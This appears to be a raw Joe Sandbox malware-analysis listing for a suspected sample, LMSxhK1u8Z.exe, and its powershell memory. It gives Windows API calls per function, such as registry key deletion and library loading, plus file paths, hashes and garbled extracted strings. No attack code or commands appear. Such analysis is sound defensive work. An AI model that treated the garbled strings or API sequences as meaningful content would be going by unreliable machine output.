                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                • String ID: C:\Program Files (x86)\edelweissen\romanblade.ini
                                                                                                • API String ID: 1356686001-3814320704
                                                                                                • Opcode ID: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
                                                                                                • Instruction ID: ae8cd99e4777b9a91f11086a6aa50b0fceabbd5df02328ddbc6dea80253d30cd
                                                                                                • Opcode Fuzzy Hash: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
                                                                                                • Instruction Fuzzy Hash: 73119371A00109BFEB10EFA1DE49EAF7A7CEB40358F11403AF505B61D0DBB85D409B68
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B31
                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402B6D
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402B76
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402B9B
                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402BB9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1912718029-0
                                                                                                • Opcode ID: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
                                                                                                • Instruction ID: 30c1bee4f6ef5540a549b97fb3682634b1066eef3f365ecf60e24fe04a280a9b
                                                                                                • Opcode Fuzzy Hash: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
                                                                                                • Instruction Fuzzy Hash: F6113A71500108BFDF109F90DE89DAE3B79EB44348F10447AFA15B11A0D7B9AE55AA18
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                • String ID:
                                                                                                • API String ID: 1849352358-0
                                                                                                • Opcode ID: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
                                                                                                • Instruction ID: 44b403d8ea142f61c46f59bdf5c6715f811f2d25bbd76591197da0c88fd97a40
                                                                                                • Opcode Fuzzy Hash: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
                                                                                                • Instruction Fuzzy Hash: 97F0E1B2600505BFD701DBA4EF88DDE7BBCEB08351F101465F642F1190CA749D418B38
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(0042D1F8,0042D1F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 0040486F
                                                                                                • wsprintfW.USER32 ref: 00404878
                                                                                                • SetDlgItemTextW.USER32(?,0042D1F8), ref: 0040488B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                • String ID: %u.%u%s%s
                                                                                                • API String ID: 3540041739-3551169577
                                                                                                • Opcode ID: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                                                                • Instruction ID: 9325b392590c5ef976e2008094ad60f82e4542d9ead9839402a3ec0ae1c12cd4
                                                                                                • Opcode Fuzzy Hash: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                                                                • Instruction Fuzzy Hash: F01126336002243BDB10666D9C4AEEF3699DFC2335F144637FA25F60D0D979881186E8
                                                                                                APIs
                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Timeout
                                                                                                • String ID: !
                                                                                                • API String ID: 1777923405-2657877971
                                                                                                • Opcode ID: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                                                                • Instruction ID: cdd208a87cf377e151b028b5bc2daf4d5ae5f0581749dcda0b9a9113f5b0b00f
                                                                                                • Opcode Fuzzy Hash: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                                                                • Instruction Fuzzy Hash: 35216271A44109AFDF01AFB0DA4AAAE7A75EF44744F14403EF502B61D1DAB88590DB58
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                                  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                                  • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,74DF23A0), ref: 00405055
                                                                                                  • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                • String ID: OC
                                                                                                • API String ID: 334405425-1597561874
                                                                                                • Opcode ID: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
                                                                                                • Instruction ID: a758f152f971d74a5f32e3130d7e663150c352659b46f9ca4e023949e3a286cd
                                                                                                • Opcode Fuzzy Hash: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
                                                                                                • Instruction Fuzzy Hash: 0A21A771900216EBCF20AFA5CE49A9E7EB0AF09354F20413BF615B51E0D7BD8982DB5D
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 004057B4
                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 004057BE
                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 004057D0
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 2659869361-3081826266
                                                                                                • Opcode ID: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                                                                • Instruction ID: d5080c12e7ff52c275ddc2bb7fa08cb5908483c46ce1eaa0ff7902437740b8fb
                                                                                                • Opcode Fuzzy Hash: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                                                                • Instruction Fuzzy Hash: 6ED05E31101E20AAC1116B549C08EDF66ACEE45300740802BF141B30A1D7781D418AFD
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(00000000,00000000,00402E7B,00000001,?,?,?,00000000,004033FE,?), ref: 00402CAE
                                                                                                • GetTickCount.KERNEL32 ref: 00402CCC
                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402C15,00000000), ref: 00402CE9
                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004033FE,?), ref: 00402CF7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                • String ID:
                                                                                                • API String ID: 2102729457-0
                                                                                                • Opcode ID: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                                                                • Instruction ID: 286efe5820fb8a572a90530028cebd71549732c65272ed0b190b82beaa7bbda7
                                                                                                • Opcode Fuzzy Hash: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                                                                • Instruction Fuzzy Hash: 6CF05E70606620BFD7216B24FF4D98F7A64F744B11B91043AF141B11E4C7B448C18BDC
                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 00404F9D
                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00404FEE
                                                                                                  • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                • String ID:
                                                                                                • API String ID: 3748168415-3916222277
                                                                                                • Opcode ID: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                                                • Instruction ID: 5368250be3cb6e4106e80ca770201d47c576881e659a98db37bb9bc21f5752cc
                                                                                                • Opcode Fuzzy Hash: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                                                • Instruction Fuzzy Hash: 1A0184B150020AAFDF219F11DD81EAB3766EBC5755F104037FB00761D1CB7A8D62D669
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,0040365D,0040349F,?), ref: 0040369F
                                                                                                • GlobalFree.KERNEL32(?), ref: 004036A6
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403697
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$GlobalLibrary
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 1100898210-3081826266
                                                                                                • Opcode ID: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                                                • Instruction ID: 198638f61427fefc2148c68e53f1161767bd25bd987848fccacf8e5b1a1d3e49
                                                                                                • Opcode Fuzzy Hash: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                                                • Instruction Fuzzy Hash: C1E08C3250112067CA315F65E90472AB76CAF4AB22F05442AE8807B36087745C534BC8
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LMSxhK1u8Z.exe,C:\Users\user\Desktop\LMSxhK1u8Z.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00405800
                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LMSxhK1u8Z.exe,C:\Users\user\Desktop\LMSxhK1u8Z.exe,80000000,00000003,?,?,?,00000000,004033FE), ref: 00405810
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrlen
                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                • API String ID: 2709904686-224404859
                                                                                                • Opcode ID: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                                                                • Instruction ID: 957e04025a41c1941cffb014cac20df3e0ff5def3477a48c76d927f6f21090a4
                                                                                                • Opcode Fuzzy Hash: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                                                                • Instruction Fuzzy Hash: EED05EB3411D209AD3127B04DC04A9F67ACFF51300746846AE841A61A1D7B85C908AEC
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 0040595C
                                                                                                • CharNextA.USER32(?,?,00000000,00405B51,00000000,[Rename]), ref: 0040596D
                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 190613189-0
                                                                                                • Opcode ID: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                                                • Instruction ID: d765cdcf26b5ece385e96dcd0ac43345a120d35f2bfa0d6b32256e58560247d7
                                                                                                • Opcode Fuzzy Hash: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                                                • Instruction Fuzzy Hash: 60F09632504918FFC7129FA5DD00D9FBBA8EF163A4B2540BAE841F7211D674DE019F59
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$(fwl$4'^q$4'^q$4'^q$4'^q$4tl$4tl$x.hk$x.hk$-hk
                                                                                                • API String ID: 0-3394531315
                                                                                                • Opcode ID: f77eec1a97651643685bc4b2f84dba80de30ae0f5dddf066e0859bf64fcb803d
                                                                                                • Instruction ID: d51a8abeb4d2d556e0ea46cff303f462c8846a24d520082393c1f8cf2f152419
                                                                                                • Opcode Fuzzy Hash: f77eec1a97651643685bc4b2f84dba80de30ae0f5dddf066e0859bf64fcb803d
                                                                                                • Instruction Fuzzy Hash: 399264B0A002199FD724DF58C951BAABBB2EB95314F50C0D9D9099F341CB72ED85CFA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$(fwl$4'^q$4'^q$4'^q$4'^q$x.hk$-hk
                                                                                                • API String ID: 0-3769942141
                                                                                                • Opcode ID: 1abc7ec6e172bcae73b01c40fbfe7a5d36b1dc8fd089a5ce8ccb2e834d750c2b
                                                                                                • Instruction ID: 40bc515d7fe03cb6ace65b7753f085681e7041f9ad986174d73b302cfddb9c5f
                                                                                                • Opcode Fuzzy Hash: 1abc7ec6e172bcae73b01c40fbfe7a5d36b1dc8fd089a5ce8ccb2e834d750c2b
                                                                                                • Instruction Fuzzy Hash: 02E191F4A002059FDB24DF68C555BAEBBE2EB84301F50C4A9DA056F395CF71E8468FA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$W$$^q$$^q$$^q
                                                                                                • API String ID: 0-2323755208
                                                                                                • Opcode ID: 654c1de27f8f2eaacda4eaf7d7c8133cf1f37f25b0e8b99191d0774d858431b5
                                                                                                • Instruction ID: ddbfafe0d3f6e5d71829f3c3321df9a0058f94a002c40e4ae2c4ba168e1694f4
                                                                                                • Opcode Fuzzy Hash: 654c1de27f8f2eaacda4eaf7d7c8133cf1f37f25b0e8b99191d0774d858431b5
                                                                                                • Instruction Fuzzy Hash: 9EB115F2B0021ADFEF25CA2885152BABBA3EB85311F14C0EED815DF251DB75C945CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$4'^q$4'^q$x.hk$-hk
                                                                                                • API String ID: 0-3948404401
                                                                                                • Opcode ID: 5bd3f3c80ab40165934f85ecdcc3c66aa91a5d2a1c304a983c0be159f14052f3
                                                                                                • Instruction ID: 1eb88d9ed6e1e397ea77de1425f2f83a64d34ff7161490b014dfde5af5567b53
                                                                                                • Opcode Fuzzy Hash: 5bd3f3c80ab40165934f85ecdcc3c66aa91a5d2a1c304a983c0be159f14052f3
                                                                                                • Instruction Fuzzy Hash: 55C17DF4A002059FDB24CF58C550BADBBF2EB88314F54C4A9DA05AF395CB75A846CFA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$x.hk$-hk
                                                                                                • API String ID: 0-4195761117
                                                                                                • Opcode ID: df79988a0d919b7a7e2ec6ca5769f43ad6ca955cc62d9da61eb8f9f231bf4f74
                                                                                                • Instruction ID: a41cef2880dcc9feb231e41a83628a3034a1276a2483d4abc06ac19d92f16850
                                                                                                • Opcode Fuzzy Hash: df79988a0d919b7a7e2ec6ca5769f43ad6ca955cc62d9da61eb8f9f231bf4f74
                                                                                                • Instruction Fuzzy Hash: 944262B4A00215DFD724DB58C951FAABBB2EB89314F10C099DA099F391CB72ED85CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$4'^q$4tl$x.hk
                                                                                                • API String ID: 0-1449149415
                                                                                                • Opcode ID: 5bb08181db9a918ba249fd7c676d4d13a52fc8f3b5d49d3e31d45c75c07070c3
                                                                                                • Instruction ID: 179c66321fe05724cd32f9a407205a2477a435f29ceb59c8df4f7383636b3327
                                                                                                • Opcode Fuzzy Hash: 5bb08181db9a918ba249fd7c676d4d13a52fc8f3b5d49d3e31d45c75c07070c3
                                                                                                • Instruction Fuzzy Hash: 54124FF4A00219DFEB24CB14C951BAABBB2EB55314F50C0D9D50DAB351CB72AD85CFA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$4'^q$4tl$x.hk
                                                                                                • API String ID: 0-1449149415
                                                                                                • Opcode ID: 98686cbb313b78486c2a765dc35df6ffbaa85394d3580284a71b7b004c16f24f
                                                                                                • Instruction ID: cb6e19a1e21b12085ad0e68c079662707b8ee51b9cc47876ef5752727f6f804e
                                                                                                • Opcode Fuzzy Hash: 98686cbb313b78486c2a765dc35df6ffbaa85394d3580284a71b7b004c16f24f
                                                                                                • Instruction Fuzzy Hash: 0CE14AF0A00219CFEB24CB14C955BAABBB2EB55314F50C1D9D50DAB381CB72AD85CFA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$x.hk$-hk
                                                                                                • API String ID: 0-3546449468
                                                                                                • Opcode ID: 797163933722f7f1032867e037f37ef49b3d9411fbc9bee910f0cc5db11d63ff
                                                                                                • Instruction ID: bfcbac2d78470ac6fca2254ac86f14c2e95d6cc07a32e4d28bbc65fc798fceb8
                                                                                                • Opcode Fuzzy Hash: 797163933722f7f1032867e037f37ef49b3d9411fbc9bee910f0cc5db11d63ff
                                                                                                • Instruction Fuzzy Hash: 82524FB4A00215DFD724DB18C951FAABBB2EB89314F50C0D9DA099F391CA72AD85CF91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$x.hk$-hk
                                                                                                • API String ID: 0-3546449468
                                                                                                • Opcode ID: 15b4ccad2a7125cf1e95e08037ae20858adf1aa7a399faf40b1d699a32592d80
                                                                                                • Instruction ID: 55a624922874bc8e089daae46e8e3a099996be59b31d19dc0cc00f687a96e84b
                                                                                                • Opcode Fuzzy Hash: 15b4ccad2a7125cf1e95e08037ae20858adf1aa7a399faf40b1d699a32592d80
                                                                                                • Instruction Fuzzy Hash: 50426EB0B002149FD724DF58C951BEABBB2EB99315F50C099DA099F381CB72ED818F91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$x.hk$-hk
                                                                                                • API String ID: 0-3546449468
                                                                                                • Opcode ID: 39df2029e04cc67842a9533f46f6634904d2f32a79633a303d1e73dcbd7a51d3
                                                                                                • Instruction ID: b98398952d1da27825d25736c2b1e1252400cda71580b13932a2f870e0007ded
                                                                                                • Opcode Fuzzy Hash: 39df2029e04cc67842a9533f46f6634904d2f32a79633a303d1e73dcbd7a51d3
                                                                                                • Instruction Fuzzy Hash: 64224FB4A00215DFD724DB18C951FAABBB2EB89314F50C099DA099F391CB72ED85CF91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$x.hk$-hk
                                                                                                • API String ID: 0-3546449468
                                                                                                • Opcode ID: c9a62ef79a7d956450a321630f03ff0bef2786eabe95600ccd11feda12f815c1
                                                                                                • Instruction ID: 7ccfccb52a99f95d16da359e0f58d633a73abc63a6198363d4c37c46ff4c8313
                                                                                                • Opcode Fuzzy Hash: c9a62ef79a7d956450a321630f03ff0bef2786eabe95600ccd11feda12f815c1
                                                                                                • Instruction Fuzzy Hash: 311261B4B002149FD724DF58C951BEABBB2EB89315F50C099DA099F381CB72ED858F91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q$$^q
                                                                                                • API String ID: 0-831282457
                                                                                                • Opcode ID: a262cb5ecc04eedf80251c199db338af8538b7927cd872319f71c298fa177fc5
